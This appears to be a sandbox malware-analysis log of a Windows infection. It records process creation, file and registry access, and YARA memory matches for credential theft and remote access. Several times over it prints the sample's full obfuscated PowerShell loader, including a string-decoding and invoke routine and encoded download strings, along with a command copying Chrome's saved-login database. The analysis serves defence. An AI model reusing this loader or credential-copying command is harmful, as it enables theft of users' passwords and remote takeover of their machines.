Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V
Source: C:\Windows\SysWOW64\raserver.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering';if (${host}.currentculture) {$fortrd++;}function jimmis($poria){$jumpily=$poria.length-$fortrd;$anteopercle='substri';$anteopercle+='ng';for( $racialisation=4;$racialisation -lt $jumpily;$racialisation+=5){$fantasibilledernes+=$poria.$anteopercle.invoke( $racialisation, $fortrd);}$fantasibilledernes;}function fluorideringen($uncouthly){ . ($flanconnade) ($uncouthly);}$hoosegow=jimmis 'un.emsklvoflipz ,deir,prlspa lk,nnaalle/or,i5tilb. ,dn0bran sam,(undewcredijo.nnimprdudsno udlw horsbesl aldnbemytprim vas.1neig0 kem.irri0,lde;bl,t .onawre,aipaahn .on6 tre4wagg; arm bru.xk rs6nost4educ; wo. counrklorvb.ot:lysa1regn2fald1xmas. 
ans0 s.d)elek kroogustiemuhacrestk acoo s.j/came2 p,e0pa.r1sk m0skil0h al1radr0foot1vomi charftovaistikrleveeoverf frdogoloxbrss/unde1majo2 enn1okke.prdi0s,nn ';$neurocanal151=jimmis 'ulyduempessloweilsarq,nd- .laa priginteegleanfishtskin ';$skumredes=jimmis 'brochsp,ktbookt .onpfac,sstri:male/ afa/ carl disarafrrbiocrsvelyb,cof undr angapre,n ungkbree.stancmaybppal.a ,an/heren.bekeu,orgdiamuanoms m t8cons5eoga.s.udcidylshe,lv gra ';$minty=jimmis 'mero>jamr ';$flanconnade=jimmis ' m.lisidee sslx.ype ';$lansquenet='guls';$andejagterne = jimmis 'velkeslaucfl.nhnontohydr l.m%aadsapa.ap subpforsdca iaviv.tmiddap,la%semi\sikkc sidoe,tanrsknctoogordbyrspaddpersaco elohmm6 yd.mounu chedhydasforb am m&gall& st. singemoanct,reh truo ade forbt hyp ';fluorideringen (jimmis 'piep$.lyhgtreblac roantib arbakumeltest: f.lmw.ttykryso ,hapres.lobfuafumishoustswanilaarckons=e,te(havfclsevm litd sv. ok e/r ascmonc ,mmi$da,ea ke niri,dhoddeber j entaax igparatcodaeidenrunpen kiheu.ad)symp ');fluorideringen (jimmis 'bdep$mirkgwea.lpreco sexb uheaeighlvgel:denom unsegodit,ambh ageosk,ldre pi p.ezominirealn a,vgfrdi=anet$blomsbombkslanu re.mtakirna oedeted ratefrolsskri.jords regpevanl .ipiaerotbrne(he e$fornm resiove.nhvidtorobyko i)ba,a ');fluorideringen (jimmis ' er[deernblomek.sttnig,.revescohaeslumrsk.fvpro,ikni c ybetandpfrago ob idetan hu,tarr.mbogbagorengra.anonbghjste ungr raa]afgr:fors: suksunteedevocjantulighrvoksismletcol.ym.toppro rtahio.ourt aflo udvclynto n,tl til scin= bin dis,[br dn deved,litobtu.lubes kaesmugc resu sclrquediinfrtzardy hyapunprrlrdooscout craomalpcmi,io oscloplat ordyneappre aehaak] cuc:sh
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering';if (${host}.currentculture) {$fortrd++;}function jimmis($poria){$jumpily=$poria.length-$fortrd;$anteopercle='substri';$anteopercle+='ng';for( $racialisation=4;$racialisation -lt $jumpily;$racialisation+=5){$fantasibilledernes+=$poria.$anteopercle.invoke( $racialisation, $fortrd);}$fantasibilledernes;}function fluorideringen($uncouthly){ . ($flanconnade) ($uncouthly);}$hoosegow=jimmis 'un.emsklvoflipz ,deir,prlspa lk,nnaalle/or,i5tilb. ,dn0bran sam,(undewcredijo.nnimprdudsno udlw horsbesl aldnbemytprim vas.1neig0 kem.irri0,lde;bl,t .onawre,aipaahn .on6 tre4wagg; arm bru.xk rs6nost4educ; wo. counrklorvb.ot:lysa1regn2fald1xmas. 
ans0 s.d)elek kroogustiemuhacrestk acoo s.j/came2 p,e0pa.r1sk m0skil0h al1radr0foot1vomi charftovaistikrleveeoverf frdogoloxbrss/unde1majo2 enn1okke.prdi0s,nn ';$neurocanal151=jimmis 'ulyduempessloweilsarq,nd- .laa priginteegleanfishtskin ';$skumredes=jimmis 'brochsp,ktbookt .onpfac,sstri:male/ afa/ carl disarafrrbiocrsvelyb,cof undr angapre,n ungkbree.stancmaybppal.a ,an/heren.bekeu,orgdiamuanoms m t8cons5eoga.s.udcidylshe,lv gra ';$minty=jimmis 'mero>jamr ';$flanconnade=jimmis ' m.lisidee sslx.ype ';$lansquenet='guls';$andejagterne = jimmis 'velkeslaucfl.nhnontohydr l.m%aadsapa.ap subpforsdca iaviv.tmiddap,la%semi\sikkc sidoe,tanrsknctoogordbyrspaddpersaco elohmm6 yd.mounu chedhydasforb am m&gall& st. singemoanct,reh truo ade forbt hyp ';fluorideringen (jimmis 'piep$.lyhgtreblac roantib arbakumeltest: f.lmw.ttykryso ,hapres.lobfuafumishoustswanilaarckons=e,te(havfclsevm litd sv. ok e/r ascmonc ,mmi$da,ea ke niri,dhoddeber j entaax igparatcodaeidenrunpen kiheu.ad)symp ');fluorideringen (jimmis 'bdep$mirkgwea.lpreco sexb uheaeighlvgel:denom unsegodit,ambh ageosk,ldre pi p.ezominirealn a,vgfrdi=anet$blomsbombkslanu re.mtakirna oedeted ratefrolsskri.jords regpevanl .ipiaerotbrne(he e$fornm resiove.nhvidtorobyko i)ba,a ');fluorideringen (jimmis ' er[deernblomek.sttnig,.revescohaeslumrsk.fvpro,ikni c ybetandpfrago ob idetan hu,tarr.mbogbagorengra.anonbghjste ungr raa]afgr:fors: suksunteedevocjantulighrvoksismletcol.ym.toppro rtahio.ourt aflo udvclynto n,tl til scin= bin dis,[br dn deved,litobtu.lubes kaesmugc resu sclrquediinfrtzardy hyapunprrlrdooscout craomalpcmi,io oscloplat ordyneappre aehaak] cuc:sh
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering';if (${host}.currentculture) {$fortrd++;}function jimmis($poria){$jumpily=$poria.length-$fortrd;$anteopercle='substri';$anteopercle+='ng';for( $racialisation=4;$racialisation -lt $jumpily;$racialisation+=5){$fantasibilledernes+=$poria.$anteopercle.invoke( $racialisation, $fortrd);}$fantasibilledernes;}function fluorideringen($uncouthly){ . ($flanconnade) ($uncouthly);}$hoosegow=jimmis 'un.emsklvoflipz ,deir,prlspa lk,nnaalle/or,i5tilb. ,dn0bran sam,(undewcredijo.nnimprdudsno udlw horsbesl aldnbemytprim vas.1neig0 kem.irri0,lde;bl,t .onawre,aipaahn .on6 tre4wagg; arm bru.xk rs6nost4educ; wo. counrklorvb.ot:lysa1regn2fald1xmas. 
ans0 s.d)elek kroogustiemuhacrestk acoo s.j/came2 p,e0pa.r1sk m0skil0h al1radr0foot1vomi charftovaistikrleveeoverf frdogoloxbrss/unde1majo2 enn1okke.prdi0s,nn ';$neurocanal151=jimmis 'ulyduempessloweilsarq,nd- .laa priginteegleanfishtskin ';$skumredes=jimmis 'brochsp,ktbookt .onpfac,sstri:male/ afa/ carl disarafrrbiocrsvelyb,cof undr angapre,n ungkbree.stancmaybppal.a ,an/heren.bekeu,orgdiamuanoms m t8cons5eoga.s.udcidylshe,lv gra ';$minty=jimmis 'mero>jamr ';$flanconnade=jimmis ' m.lisidee sslx.ype ';$lansquenet='guls';$andejagterne = jimmis 'velkeslaucfl.nhnontohydr l.m%aadsapa.ap subpforsdca iaviv.tmiddap,la%semi\sikkc sidoe,tanrsknctoogordbyrspaddpersaco elohmm6 yd.mounu chedhydasforb am m&gall& st. singemoanct,reh truo ade forbt hyp ';fluorideringen (jimmis 'piep$.lyhgtreblac roantib arbakumeltest: f.lmw.ttykryso ,hapres.lobfuafumishoustswanilaarckons=e,te(havfclsevm litd sv. ok e/r ascmonc ,mmi$da,ea ke niri,dhoddeber j entaax igparatcodaeidenrunpen kiheu.ad)symp ');fluorideringen (jimmis 'bdep$mirkgwea.lpreco sexb uheaeighlvgel:denom unsegodit,ambh ageosk,ldre pi p.ezominirealn a,vgfrdi=anet$blomsbombkslanu re.mtakirna oedeted ratefrolsskri.jords regpevanl .ipiaerotbrne(he e$fornm resiove.nhvidtorobyko i)ba,a ');fluorideringen (jimmis ' er[deernblomek.sttnig,.revescohaeslumrsk.fvpro,ikni c ybetandpfrago ob idetan hu,tarr.mbogbagorengra.anonbghjste ungr raa]afgr:fors: suksunteedevocjantulighrvoksismletcol.ym.toppro rtahio.ourt aflo udvclynto n,tl til scin= bin dis,[br dn deved,litobtu.lubes kaesmugc resu sclrquediinfrtzardy hyapunprrlrdooscout craomalpcmi,io oscloplat ordyneappre aehaak] cuc:sh Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "cls;write 'fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering fantasibilledernes ansttelsesomraadets grammates methodizing skumredes synostose macrotone guls scyphiform245 nonconservation mirks171 bonaire vejrskifte tekstspalte forsorgshjemmets rhyton skoenne fullbacks solbadets afsnitsindrykningerne bordeauxvine tyngende sporingsstationens afnazificering';if (${host}.currentculture) {$fortrd++;}function jimmis($poria){$jumpily=$poria.length-$fortrd;$anteopercle='substri';$anteopercle+='ng';for( $racialisation=4;$racialisation -lt $jumpily;$racialisation+=5){$fantasibilledernes+=$poria.$anteopercle.invoke( $racialisation, $fortrd);}$fantasibilledernes;}function fluorideringen($uncouthly){ . ($flanconnade) ($uncouthly);}$hoosegow=jimmis 'un.emsklvoflipz ,deir,prlspa lk,nnaalle/or,i5tilb. ,dn0bran sam,(undewcredijo.nnimprdudsno udlw horsbesl aldnbemytprim vas.1neig0 kem.irri0,lde;bl,t .onawre,aipaahn .on6 tre4wagg; arm bru.xk rs6nost4educ; wo. counrklorvb.ot:lysa1regn2fald1xmas. 
ans0 s.d)elek kroogustiemuhacrestk acoo s.j/came2 p,e0pa.r1sk m0skil0h al1radr0foot1vomi charftovaistikrleveeoverf frdogoloxbrss/unde1majo2 enn1okke.prdi0s,nn ';$neurocanal151=jimmis 'ulyduempessloweilsarq,nd- .laa priginteegleanfishtskin ';$skumredes=jimmis 'brochsp,ktbookt .onpfac,sstri:male/ afa/ carl disarafrrbiocrsvelyb,cof undr angapre,n ungkbree.stancmaybppal.a ,an/heren.bekeu,orgdiamuanoms m t8cons5eoga.s.udcidylshe,lv gra ';$minty=jimmis 'mero>jamr ';$flanconnade=jimmis ' m.lisidee sslx.ype ';$lansquenet='guls';$andejagterne = jimmis 'velkeslaucfl.nhnontohydr l.m%aadsapa.ap subpforsdca iaviv.tmiddap,la%semi\sikkc sidoe,tanrsknctoogordbyrspaddpersaco elohmm6 yd.mounu chedhydasforb am m&gall& st. singemoanct,reh truo ade forbt hyp ';fluorideringen (jimmis 'piep$.lyhgtreblac roantib arbakumeltest: f.lmw.ttykryso ,hapres.lobfuafumishoustswanilaarckons=e,te(havfclsevm litd sv. ok e/r ascmonc ,mmi$da,ea ke niri,dhoddeber j entaax igparatcodaeidenrunpen kiheu.ad)symp ');fluorideringen (jimmis 'bdep$mirkgwea.lpreco sexb uheaeighlvgel:denom unsegodit,ambh ageosk,ldre pi p.ezominirealn a,vgfrdi=anet$blomsbombkslanu re.mtakirna oedeted ratefrolsskri.jords regpevanl .ipiaerotbrne(he e$fornm resiove.nhvidtorobyko i)ba,a ');fluorideringen (jimmis ' er[deernblomek.sttnig,.revescohaeslumrsk.fvpro,ikni c ybetandpfrago ob idetan hu,tarr.mbogbagorengra.anonbghjste ungr raa]afgr:fors: suksunteedevocjantulighrvoksismletcol.ym.toppro rtahio.ourt aflo udvclynto n,tl til scin= bin dis,[br dn deved,litobtu.lubes kaesmugc resu sclrquediinfrtzardy hyapunprrlrdooscout craomalpcmi,io oscloplat ordyneappre aehaak] cuc:sh Jump to behavior
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8C9F6 AllocateAndInitializeSid,GetLastError,AllocateAndInitializeSid,GetLastError,GetLengthSid,GetProcessHeap,HeapAlloc,InitializeAcl,GetLastError,AddAccessAllowedAce,GetLastError,AddAccessAllowedAce,GetLastError,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,AllocateAndInitializeSid,GetLastError,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,IsValidSecurityDescriptor,GetLastError,GetProcessHeap,HeapFree,FreeSid,FreeSid,FreeSid, 25_2_00C8C9F6
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C8C9F6 AllocateAndInitializeSid,GetLastError,AllocateAndInitializeSid,GetLastError,GetLengthSid,GetProcessHeap,HeapAlloc,InitializeAcl,GetLastError,AddAccessAllowedAce,GetLastError,AddAccessAllowedAce,GetLastError,InitializeSecurityDescriptor,GetLastError,SetSecurityDescriptorDacl,GetLastError,AllocateAndInitializeSid,GetLastError,SetSecurityDescriptorOwner,GetLastError,SetSecurityDescriptorGroup,GetLastError,IsValidSecurityDescriptor,GetLastError,GetProcessHeap,HeapFree,FreeSid,FreeSid,FreeSid, 25_2_00C8C9F6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\raserver.exe Code function: 25_2_00C928C5 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 25_2_00C928C5
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Source: Yara match File source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\explorer.exe Directory queried: C:\Program Files (x86)\Windows Mail wab.exe
Source: C:\Windows\explorer.exe Directory queried: C:\Program Files (x86)\Windows Mail wab.exe
Source: C:\Windows\SysWOW64\cmd.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\SysWOW64\raserver.exe File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\SysWOW64\raserver.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Remote Access Functionality

Source: Yara match File source: 00000014.00000002.1962937195.0000000000690000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2523572570.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2527878142.00000000006D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000019.00000002.2528076589.0000000000700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.1962975047.00000000006C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY